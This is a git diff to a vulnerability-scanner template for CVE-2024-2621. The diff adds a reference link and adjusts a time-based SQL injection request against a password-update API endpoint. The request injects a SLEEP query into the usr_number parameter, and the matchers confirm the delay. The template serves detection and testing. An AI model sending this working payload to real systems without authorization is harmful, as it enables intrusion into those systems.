diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml index 9bf0b453a0..e1915699de 100644 --- a/http/cves/2024/CVE-2024-2621.yaml +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -12,6 +12,7 @@ info: - https://vuldb.com/?id.257198 - https://github.com/NaInSec/CVE-LIST - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-2621 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L cvss-score: 6.3 @@ -28,14 +29,14 @@ info: http: - raw: - | - @timeout 10s - GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1 + @timeout 15s + GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - "status_code == 200" - - "duration>=5" - - "contains_all(body,'msg','header','code')" + - 'duration>=6' + - 'status_code == 200' + - 'contains_all(body,"msg\":","header\":","code\":")' condition: and